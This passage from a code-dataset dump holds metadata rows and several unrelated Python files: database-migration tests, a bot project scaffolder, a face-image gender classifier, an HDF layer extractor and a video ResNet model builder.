rmdir('db') | 28.589641 | 133 | 0.603958 | 1,000 | 7,176 | 4.131 | 0.216 | 0.038732 | 0.013556 | 0.019366 | 0.134834 | 0.088114 | 0.054708 | 0.044057 | 0.029049 | 0.029049 | 0 | 0.019561 | 0.244844 | 7,176 | 251 | 134 | 28.589641 | 0.742757 | 0.013657 | 0 | 0.178571 | 0 | 0 | 0.237173 | 0.049611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.005102 | 0.040816 | 0.010204 | 0.153061 | 0.030612 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376fcab57617bb6cde8c9472e7ac7b41d22d82ce | 15,579 | py | Python | yoyo/tests/test_migrations.py | emurphy/yoyo | f9a32d5448970da3a81041692420d5def490b7b0 | [
"Apache-2.0"
] | null | null | null | yoyo/tests/test_migrations.py | emurphy/yoyo | f9a32d5448970da3a81041692420d5def490b7b0 | [
"Apache-2.0"
] | null | null | null | yoyo/tests/test_migrations.py | emurphy/yoyo | f9a32d5448970da3a81041692420d5def490b7b0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Oliver Cope
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from mock import Mock, patch
from yoyo.connections import get_backend
from yoyo import read_migrations
from yoyo import exceptions
from yoyo import ancestors, descendants
from yoyo.tests import with_migrations, migrations_dir, dburi
from yoyo.migrations import topological_sort, MigrationList
from yoyo.scripts import newmigration
@with_migrations(
"""
step("CREATE TABLE _yoyo_test (id INT)")
""",
"""
step("INSERT INTO _yoyo_test VALUES (1)")
step("INSERT INTO _yoyo_test VALUES ('x', 'y')")
""")
def test_transaction_is_not_committed_on_error(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
with pytest.raises(backend.DatabaseError):
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT count(1) FROM _yoyo_test")
assert cursor.fetchone() == (0,)
@with_migrations(
'step("CREATE TABLE _yoyo_test (id INT)")',
'''
step("INSERT INTO _yoyo_test VALUES (1)", "DELETE FROM _yoyo_test WHERE id=1")
step("UPDATE _yoyo_test SET id=2 WHERE id=1", "UPDATE _yoyo_test SET id=1 WHERE id=2")
'''
)
def test_rollbacks_happen_in_reverse(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(2,)]
backend.rollback_migrations(migrations)
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == []
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT)")
step("INSERT INTO _yoyo_test VALUES (1)")
step("INSERT INTO _yoyo_test VALUES ('a', 'b')", ignore_errors='all')
step("INSERT INTO _yoyo_test VALUES (2)")
'''
)
def test_execution_continues_with_ignore_errors(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(1,), (2,)]
@with_migrations(
'''
from yoyo import step, group
step("CREATE TABLE _yoyo_test (id INT)")
group(
step("INSERT INTO _yoyo_test VALUES (1)"),
step("INSERT INTO _yoyo_test VALUES ('a', 'b')"),
ignore_errors='all'
)
step("INSERT INTO _yoyo_test VALUES (2)")
'''
)
def test_execution_continues_with_ignore_errors_in_transaction(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(2,)]
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT)")
step("INSERT INTO _yoyo_test VALUES (1)",
"DELETE FROM _yoyo_test WHERE id=2")
step("UPDATE _yoyo_test SET id=2 WHERE id=1",
"SELECT nonexistent FROM imaginary", ignore_errors='rollback')
'''
)
def test_rollbackignores_errors(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(2,)]
backend.rollback_migrations(migrations)
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == []
def test_migration_is_committed(backend_fixture):
with migrations_dir('step("CREATE TABLE _yoyo_test (id INT)")') as tmpdir:
migrations = read_migrations(tmpdir)
backend_fixture.apply_migrations(migrations)
backend_fixture.rollback()
rows = backend_fixture.execute("SELECT * FROM _yoyo_test").fetchall()
assert list(rows) == []
def test_rollback_happens_on_step_failure(backend_fixture):
with migrations_dir('''
step("",
"CREATE TABLE _yoyo_is_rolledback (i INT)"),
step("CREATE TABLE _yoyo_test (s VARCHAR(100))",
"DROP TABLE _yoyo_test")
step("invalid sql!")''') as tmpdir:
migrations = read_migrations(tmpdir)
with pytest.raises(backend_fixture.DatabaseError):
backend_fixture.apply_migrations(migrations)
# The _yoyo_test table should have either been deleted (transactional ddl)
# or dropped (non-transactional-ddl)
with pytest.raises(backend_fixture.DatabaseError):
backend_fixture.execute("SELECT * FROM _yoyo_test")
# Transactional DDL: rollback steps not executed
if backend_fixture.has_transactional_ddl:
with pytest.raises(backend_fixture.DatabaseError):
backend_fixture.execute("SELECT * FROM _yoyo_is_rolledback")
# Non-transactional DDL: ensure the rollback steps were executed
else:
cursor = backend_fixture.execute("SELECT * FROM _yoyo_is_rolledback")
assert list(cursor.fetchall()) == []
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT)")
step("DROP TABLE _yoyo_test")
'''
)
def test_specify_migration_table(tmpdir):
backend = get_backend(dburi, migration_table='another_migration_table')
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT id FROM another_migration_table")
assert cursor.fetchall() == [('0',)]
@with_migrations(
'''
def foo(conn):
conn.cursor().execute("CREATE TABLE foo_test (id INT)")
conn.cursor().execute("INSERT INTO foo_test VALUES (1)")
def bar(conn):
foo(conn)
step(bar)
'''
)
def test_migration_functions_have_namespace_access(tmpdir):
"""
Test that functions called via step have access to the script namespace
"""
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT id FROM foo_test")
assert cursor.fetchall() == [(1,)]
@with_migrations(
'''
from yoyo import group, step
step("CREATE TABLE _yoyo_test (id INT)")
group(step("INSERT INTO _yoyo_test VALUES (1)")),
'''
)
def test_migrations_can_import_step_and_group(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT id FROM _yoyo_test")
assert cursor.fetchall() == [(1,)]
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT, c VARCHAR(1))")
step("INSERT INTO _yoyo_test VALUES (1, 'a')")
step("INSERT INTO _yoyo_test VALUES (2, 'b')")
step("SELECT * FROM _yoyo_test")
'''
)
def test_migrations_display_selected_data(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
with patch('yoyo.migrations.stdout') as stdout:
backend.apply_migrations(migrations)
written = ''.join(a[0] for a, kw in stdout.write.call_args_list)
assert written == (' id | c \n'
'----+---\n'
' 1 | a \n'
' 2 | b \n'
'(2 rows)\n')
class TestTopologicalSort(object):
def get_mock_migrations(self):
class MockMigration(Mock):
def __repr__(self):
return "<MockMigration {}>".format(self.id)
return [MockMigration(id='m1', depends=set()),
MockMigration(id='m2', depends=set()),
MockMigration(id='m3', depends=set()),
MockMigration(id='m4', depends=set())]
def test_it_keeps_stable_order(self):
m1, m2, m3, m4 = self.get_mock_migrations()
assert list(topological_sort([m1, m2, m3, m4])) == [m1, m2, m3, m4]
assert list(topological_sort([m4, m3, m2, m1])) == [m4, m3, m2, m1]
def test_it_sorts_topologically(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m3.depends.add(m4)
assert list(topological_sort([m1, m2, m3, m4])) == [m4, m3, m1, m2]
def test_it_brings_depended_upon_migrations_to_the_front(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m1.depends.add(m4)
assert list(topological_sort([m1, m2, m3, m4])) == [m4, m1, m2, m3]
def test_it_discards_missing_dependencies(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m3.depends.add(Mock())
assert list(topological_sort([m1, m2, m3, m4])) == [m1, m2, m3, m4]
def test_it_catches_cycles(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m3.depends.add(m3)
with pytest.raises(exceptions.BadMigration):
list(topological_sort([m1, m2, m3, m4]))
def test_it_handles_multiple_edges_to_the_same_node(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m2.depends.add(m1)
m3.depends.add(m1)
m4.depends.add(m1)
assert list(topological_sort([m1, m2, m3, m4])) == [m1, m2, m3, m4]
class TestMigrationList(object):
def test_can_create_empty(self):
m = MigrationList()
assert list(m) == []
def test_cannot_create_with_duplicate_ids(self):
with pytest.raises(exceptions.MigrationConflict):
MigrationList([Mock(id=1), Mock(id=1)])
def test_can_append_new_id(self):
m = MigrationList([Mock(id=n) for n in range(10)])
m.append(Mock(id=10))
def test_cannot_append_duplicate_id(self):
m = MigrationList([Mock(id=n) for n in range(10)])
with pytest.raises(exceptions.MigrationConflict):
m.append(Mock(id=1))
def test_deletion_allows_reinsertion(self):
m = MigrationList([Mock(id=n) for n in range(10)])
del m[0]
m.append(Mock(id=0))
def test_can_overwrite_slice_with_same_ids(self):
m = MigrationList([Mock(id=n) for n in range(10)])
m[1:3] = [Mock(id=2), Mock(id=1)]
def test_cannot_overwrite_slice_with_conflicting_ids(self):
m = MigrationList([Mock(id=n) for n in range(10)])
with pytest.raises(exceptions.MigrationConflict):
m[1:3] = [Mock(id=4)]
class TestAncestorsDescendants(object):
def setup(self):
self.m1 = Mock(id='m1', depends=['m2', 'm3'])
self.m2 = Mock(id='m2', depends=['m3'])
self.m3 = Mock(id='m3', depends=['m5'])
self.m4 = Mock(id='m4', depends=['m5'])
self.m5 = Mock(id='m5', depends=[])
self.m1.depends = {self.m2, self.m3}
self.m2.depends = {self.m3}
self.m3.depends = {self.m5}
self.m4.depends = {self.m5}
self.migrations = {self.m1, self.m2, self.m3, self.m4, self.m5}
def test_ancestors(self):
assert ancestors(self.m1, self.migrations) == {self.m2, self.m3,
self.m5}
assert ancestors(self.m2, self.migrations) == {self.m3, self.m5}
assert ancestors(self.m3, self.migrations) == {self.m5}
assert ancestors(self.m4, self.migrations) == {self.m5}
assert ancestors(self.m5, self.migrations) == set()
def test_descendants(self):
assert descendants(self.m1, self.migrations) == set()
assert descendants(self.m2, self.migrations) == {self.m1}
assert descendants(self.m3, self.migrations) == {self.m2, self.m1}
assert descendants(self.m4, self.migrations) == set()
assert descendants(self.m5, self.migrations) == {self.m4, self.m3,
self.m2, self.m1}
class TestReadMigrations(object):
@with_migrations(**{newmigration.tempfile_prefix + 'test': ''})
def test_it_ignores_yoyo_new_tmp_files(self, tmpdir):
"""
The yoyo new command creates temporary files in the migrations directory.
These shouldn't be picked up by yoyo apply etc
"""
assert len(read_migrations(tmpdir)) == 0
@with_migrations(**{'post-apply': '''step('SELECT 1')'''})
def test_it_loads_post_apply_scripts(self, tmpdir):
migrations = read_migrations(tmpdir)
assert len(migrations) == 0
assert len(migrations.post_apply) == 1
@with_migrations(**{'a': '''step('SELECT 1')'''})
def test_it_does_not_add_duplicate_steps(self, tmpdir):
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
@with_migrations(**{'a': '''from yoyo import step; step('SELECT 1')'''})
def test_it_does_not_add_duplicate_steps_with_imported_symbols(self, tmpdir):
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
class TestPostApplyHooks(object):
def test_post_apply_hooks_are_run_every_time(self):
backend = get_backend(dburi)
migrations = migrations_dir(
**{'a': "step('create table postapply (i int)')",
'post-apply': "step('insert into postapply values (1)')"})
with migrations as tmp:
def count_postapply_calls():
cursor = backend.cursor()
cursor.execute("SELECT count(1) FROM postapply")
return cursor.fetchone()[0]
def _apply_migrations():
backend.apply_migrations(
backend.to_apply(read_migrations(tmp)))
# Should apply migration 'a' and call the post-apply hook
_apply_migrations()
assert count_postapply_calls() == 1
# No outstanding migrations: post-apply hook should not be called
_apply_migrations()
assert count_postapply_calls() == 1
# New migration added: post-apply should be called a second time
migrations.add_migration('b', '')
_apply_migrations()
assert count_postapply_calls() == 2
@with_migrations(**{
'a': "step('create table postapply (i int)')",
'post-apply': "step('insert into postapply values (1)')",
'post-apply2': "step('insert into postapply values (2)')"})
def test_it_runs_multiple_post_apply_hooks(self, tmpdir):
backend = get_backend(dburi)
backend.apply_migrations(backend.to_apply(read_migrations(tmpdir)))
cursor = backend.cursor()
cursor.execute("SELECT * FROM postapply")
assert cursor.fetchall() == [(1,), (2,)]
@with_migrations(**{
'a': "step('create table postapply (i int)')",
'post-apply': "step('insert into postapply values (1)')"})
def test_apply_migrations_only_does_not_run_hooks(self, tmpdir):
backend = get_backend(dburi)
backend.apply_migrations_only(backend.to_apply(read_migrations(tmpdir)))
cursor = backend.cursor()
cursor.execute("SELECT * FROM postapply")
assert cursor.fetchall() == []
| 35.649886 | 86 | 0.642275 | 1,950 | 15,579 | 4.926667 | 0.144615 | 0.034975 | 0.039554 | 0.012491 | 0.588633 | 0.525034 | 0.506089 | 0.457895 | 0.435516 | 0.404393 | 0 | 0.020156 | 0.232492 | 15,579 | 436 | 87 | 35.731651 | 0.783307 | 0.073368 | 0 | 0.417857 | 0 | 0 | 0.107761 | 0.005396 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.135714 | false | 0 | 0.042857 | 0.003571 | 0.210714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
377084db60ebee117b24913239fec5ff9e73b737 | 2,613 | py | Python | aiogram_oop_framework/core/project.py | drforse/aiogram_oop_framework | ee56b6a0893300fea43f01c2f4c4ea8b5fae1424 | [
"MIT"
] | null | null | null | aiogram_oop_framework/core/project.py | drforse/aiogram_oop_framework | ee56b6a0893300fea43f01c2f4c4ea8b5fae1424 | [
"MIT"
] | null | null | null | aiogram_oop_framework/core/project.py | drforse/aiogram_oop_framework | ee56b6a0893300fea43f01c2f4c4ea8b5fae1424 | [
"MIT"
] | null | null | null | from pathlib import Path
from aiogram_oop_framework.core.funcs import get_init_py
class ProjectStructure:
def __init__(self, project: 'Project'):
self.root: Path = project.path / project.name
self.directories = {'root': {'directory': self.root, 'tree': {}}}
def add_dir_to_root(self, name: str):
path = self.root / name
self.directories['root']['tree'][name] = {'directory': path, 'tree': {}}
def add_dir(self, path: str, name: str):
"""
:param path: any_dir.another_dir (found in project root)
:param name: dir_name
:return:
"""
path_steps = path.split('.')
current_step = self.directories['root']
for step in path_steps:
current_step = current_step['tree'][step]
path = current_step['directory'] / name
current_step['tree'][name] = {'directory': path, 'tree': {}}
def include(self, path: str):
"""
it will create the folders in the path which aren't created yet
:param path: any_dir.another_dir (found in project root)
:return:
"""
path_steps = path.split('.')
current_step = self.directories['root']
for step in path_steps:
current_step_struc = current_step['tree'].get(step)
if current_step_struc:
current_step = current_step_struc
else:
current_step['tree'][step] = {'directory': current_step['directory'] / step, 'tree': {}}
current_step = current_step['tree'][step]
def apply_changes(self):
def foo(tree: dict):
for directory in tree:
path: Path = tree[directory]['directory']
if not path.exists():
path.mkdir()
with open(path / '__init__.py', 'w') as f:
f.write('\n')
foo(tree[directory]['tree'])
foo(self.directories['root']['tree'])
class Project:
def __init__(self, name: str, path: Path = None):
self.name: str = name
self.path: Path = path
self.structure: ProjectStructure = None
def create(self, default=True):
if not self.path:
self.path = Path.cwd()
path = self.path / self.name
Path.mkdir(path)
get_init_py(path, self.name)
if default and not self.structure:
self.structure = ProjectStructure(self)
self.structure.include('views')
self.structure.apply_changes()
if self.structure:
self.structure.apply_changes()
| 34.381579 | 104 | 0.566781 | 304 | 2,613 | 4.700658 | 0.236842 | 0.115465 | 0.06648 | 0.046186 | 0.279916 | 0.249825 | 0.176347 | 0.176347 | 0.176347 | 0.176347 | 0 | 0 | 0.307692 | 2,613 | 75 | 105 | 34.84 | 0.789939 | 0.083046 | 0 | 0.188679 | 0 | 0 | 0.068653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.150943 | false | 0 | 0.037736 | 0 | 0.226415 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37756f838d9a991c6fb09146913f58963f4cf285 | 3,149 | py | Python | gender_detection_keras.py | matejcrnac/Face_deidentification_kazemi | 434fff49b5a7b555bb3c56a62915fd502e0b75f9 | [
"MIT"
] | 1 | 2019-03-27T10:30:54.000Z | 2019-03-27T10:30:54.000Z | gender_detection_keras.py | matejcrnac/Face_deidentification_kazemi | 434fff49b5a7b555bb3c56a62915fd502e0b75f9 | [
"MIT"
] | null | null | null | gender_detection_keras.py | matejcrnac/Face_deidentification_kazemi | 434fff49b5a7b555bb3c56a62915fd502e0b75f9 | [
"MIT"
] | null | null | null | #Classifier 1-------------------------------------------------------------
# author: Arun Ponnusamy
# website: https://www.arunponnusamy.com
# import necessary packages
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
import cv2
import cvlib as cv
class GenderDetectKeras:
def __init__(self, model_path):
self.model = load_model(model_path)
# 0 - man
# 1 - woman
def predict(self, image_path, confidence = False):
# read input image
image = cv2.imread(image_path)
if image is None:
print("Could not read input image")
exit()
#preproces image
# detect faces in the image
face, confidence = cv.detect_face(image)
# get corner points of face rectangle
face = face[0]
(startX, startY) = face[0], face[1]
(endX, endY) = face[2], face[3]
# crop the detected face region
face_crop = np.copy(image[startY:endY,startX:endX])
# preprocessing for gender detection model
face_crop = cv2.resize(face_crop, (96,96))
face_crop = face_crop.astype("float") / 255.0
face_crop = img_to_array(face_crop)
face_crop = np.expand_dims(face_crop, axis=0)
# apply gender detection on face
conf = self.model.predict(face_crop)[0]
# get label with max accuracy
idx = np.argmax(conf)
if confidence == True:
return conf
return idx
def predict_label(self, image_path):
classes = ['man','woman']
predicted = self.predict(image_path)
label = classes[predicted]
return label
if __name__ == "__main__":
imagePath_same1 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/000/000_1_1.ppm" # sve dobro,
imagePath_same2 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/001/001_1_1.ppm" # sve dobro
imagePath_same3 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/002/002_1_1.ppm" # spec bolji (k4 prob)
imagePath_same4 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/004/004_1_1.ppm" # spec bolji od all dist
imagePath_same5 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/005/005_1_1.ppm" # spec najbolji
imagePath_same6 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/006/006_1_1.ppm"
imagePath_same7 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/007/007_1_1.ppm" # nije dobar
imagePath_same8 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/008/008_1_1.ppm"
imagePath_same9 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/009/009_1_1.ppm"
imagePath_same10 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/010/010_1_1.ppm"
model_path = "gender_models/gender_detection_keras.model"
imagePath = imagePath_same3
classifier = GenderDetectKeras(model_path)
predicted = classifier.predict(imagePath)
print(predicted)
label = classifier.predict_label(imagePath)
print("Detected gender is:")
print(label)
| 33.5 | 117 | 0.659257 | 414 | 3,149 | 4.78744 | 0.335749 | 0.040363 | 0.090817 | 0.110999 | 0.258325 | 0.244198 | 0.221998 | 0.221998 | 0 | 0 | 0 | 0.050778 | 0.224516 | 3,149 | 93 | 118 | 33.860215 | 0.760852 | 0.158463 | 0 | 0 | 0 | 0 | 0.29962 | 0.274525 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.098039 | 0 | 0.235294 | 0.078431 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3775c014edc4cfe9bbf99059dbab03441eae21fe | 3,389 | py | Python | dnppy/convert/_extract_HDF_layer_data.py | NASA-DEVELOP/dnppy | 8f7ef6f0653f5a4ea730ee557c72a2c89c06ce0b | [
"NASA-1.3"
] | 65 | 2015-09-10T12:59:56.000Z | 2022-02-27T22:09:03.000Z | dnppy/convert/_extract_HDF_layer_data.py | snowzm/dnppy | 8f7ef6f0653f5a4ea730ee557c72a2c89c06ce0b | [
"NASA-1.3"
] | 40 | 2015-04-08T19:23:30.000Z | 2015-08-04T15:53:11.000Z | dnppy/convert/_extract_HDF_layer_data.py | snowzm/dnppy | 8f7ef6f0653f5a4ea730ee557c72a2c89c06ce0b | [
"NASA-1.3"
] | 45 | 2015-08-14T19:09:38.000Z | 2022-02-15T18:53:16.000Z | __author__ = ['djjensen', 'jwely']
__all__ = ["_extract_HDF_layer_data"]
import gdal
import os
def _extract_HDF_layer_data(hdfpath, layer_indexs = None):
"""
Extracts one or more layers from an HDF file and returns a dictionary with
all the data available in the HDF layer for use in further format conversion
to better supported formats.
For example -
hdfpath = filepath to an hdf file. (any HDF 4 or 5 datatype)
layer indexs = [1,2,3]
the output dict will have keys :
["MasterMetadata", "1", "2", "3"]
where the "MasterMetadata" values very widely in format depending on
data source, but might contain georeferencing information and the like.
Each of the values for those integer keys will simply be a gdal.dataset
object.
This function is the first step in the chain for turning HDF data into
geotiff. the next step is to build an established datatype
:param hdfpath filepath to any HDF formated file
:param layer_indexs list of integer index values for layers to extract
:return out_info: dict of metadata and gdal.dataset objects
"""
# output dict
out_info = {}
layer_names = []
# open the HDF dataset
hdf_dataset = gdal.Open(hdfpath)
subdatasets = hdf_dataset.GetSubDatasets()
# establish layer indices if left default
if layer_indexs is None:
layer_indexs = range(len(subdatasets))
elif isinstance(layer_indexs, int):
layer_indexs = [layer_indexs]
# print a summary of the layer content
print("Contents of {0}".format(os.path.basename(hdfpath)))
for i, dataset_string in enumerate(subdatasets):
print(" {0} {1}".format(i, dataset_string[1]))
if i in layer_indexs:
layer_names.append(dataset_string[1])
# give metadata info for the entire layer
mdict = hdf_dataset.GetMetadata()
out_info["MasterMetadata"] = mdict
#for key in mdict:
#print key," = ", mdict[key]
# perform operation on each of the desired layers
for layer in layer_indexs:
subdataset = gdal.Open(subdatasets[layer][0])
out_info[layer] = subdataset
return out_info
if __name__ == "__main__":
#try MODIS
#rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\MOD09A1.A2015033.h11v05.005.2015044233105.hdf"
#_extract_HDF_layer_data(rasterpath)
# try GPM
rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\3B-HHR-L.MS.MRG.3IMERG.20150401-S233000-E235959.1410.V03E.RT-H5"
_extract_HDF_layer_data(rasterpath)
# try TRMM
#rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\3B42.20140101.00.7.HDF"
#_extract_HDF_layer_data(rasterpath)
# try ASTER?
#rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\AG100.v003.28.-098.0001.h5"
#_extract_HDF_layer_data(rasterpath)
# try VIIRS
#rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\GDNBO-SVDNB_npp_d20150626_t0132557_e0138361_b18964_c20150626174428799822_noaa_ops.h5"
#stuff = _extract_HDF_layer_data(rasterpath, [2, 4])
#print stuff[2].GetProjection()
#print stuff[2].GetGeoTransform()
#lat = stuff[2].ReadAsArray()
#lon = stuff[4].ReadAsArray()
#print lat[0, 0],lat[0, -1],lat[-1, 0],lat[-1, -1]
#print lon[0, 0],lon[0, -1],lon[-1, 0],lon[-1, -1]
| 33.89 | 154 | 0.691059 | 475 | 3,389 | 4.764211 | 0.397895 | 0.048608 | 0.046399 | 0.058772 | 0.188688 | 0.175873 | 0.175873 | 0.114892 | 0.114892 | 0 | 0 | 0.06448 | 0.208321 | 3,389 | 99 | 155 | 34.232323 | 0.778979 | 0.594571 | 0 | 0 | 0 | 0.037037 | 0.153907 | 0.106551 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.148148 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
377821387853d45c0c5a9841c83920bc6e3f180e | 1,964 | py | Python | network/R2plus1d.py | sabarim/3DC-Seg | 210ee5b9ddebfed7b44c544e2eeb8c3d00e2a7d7 | [
"MIT"
] | 50 | 2020-09-11T07:57:49.000Z | 2022-03-27T06:37:37.000Z | network/R2plus1d.py | sabarim/3DC-Seg | 210ee5b9ddebfed7b44c544e2eeb8c3d00e2a7d7 | [
"MIT"
] | 15 | 2020-09-11T12:54:34.000Z | 2022-01-13T08:38:38.000Z | network/R2plus1d.py | sabarim/3DC-Seg | 210ee5b9ddebfed7b44c544e2eeb8c3d00e2a7d7 | [
"MIT"
] | 12 | 2020-10-01T07:29:53.000Z | 2021-09-18T11:00:49.000Z | import torch
from torch import nn
from torchvision.models.video.resnet import VideoResNet, BasicBlock, Conv2Plus1D, R2Plus1dStem
model_urls = {
"r2plus1d_34_8_ig65m": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip8_ig65m_from_scratch-9bae36ae.pth", # noqa: E501
"r2plus1d_34_32_ig65m": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip32_ig65m_from_scratch-449a7af9.pth", # noqa: E501
"r2plus1d_34_8_kinetics": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip8_ft_kinetics_from_ig65m-0aa0550b.pth", # noqa: E501
"r2plus1d_34_32_kinetics": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip32_ft_kinetics_from_ig65m-ade133f1.pth", # noqa: E501
}
def r2plus1d_34(num_classes, pretrained=False, progress=False, arch=None):
model = VideoResNet(block=BasicBlock,
conv_makers=[Conv2Plus1D] * 4,
layers=[3, 4, 6, 3],
stem=R2Plus1dStem)
model.fc = nn.Linear(model.fc.in_features, out_features=num_classes)
# Fix difference in PyTorch vs Caffe2 architecture
# https://github.com/facebookresearch/VMZ/issues/89
# https://github.com/pytorch/vision/issues/1265
model.layer2[0].conv2[0] = Conv2Plus1D(128, 128, 288)
model.layer3[0].conv2[0] = Conv2Plus1D(256, 256, 576)
model.layer4[0].conv2[0] = Conv2Plus1D(512, 512, 1152)
# We need exact Caffe2 momentum for BatchNorm scaling
for m in model.modules():
if isinstance(m, nn.BatchNorm3d):
m.eps = 1e-3
m.momentum = 0.9
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict)
model.conv1 = model.stem
return model
| 44.636364 | 171 | 0.682281 | 260 | 1,964 | 4.961538 | 0.4 | 0.069767 | 0.065116 | 0.074419 | 0.293798 | 0.277519 | 0.24186 | 0.24186 | 0.24186 | 0.24186 | 0 | 0.116592 | 0.205193 | 1,964 | 43 | 172 | 45.674419 | 0.709801 | 0.1222 | 0 | 0 | 0 | 0.142857 | 0.330029 | 0.026239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3778b68ea4424c5dd5d977058233e58cf1a45c2c | 2,213 | py | Python | mapillary_tools/gps_parser.py | didier2020/mapillary_tools | 23b8f422559f8dfdabdebc26d0d2001d40fbe2ef | [
"BSD-2-Clause"
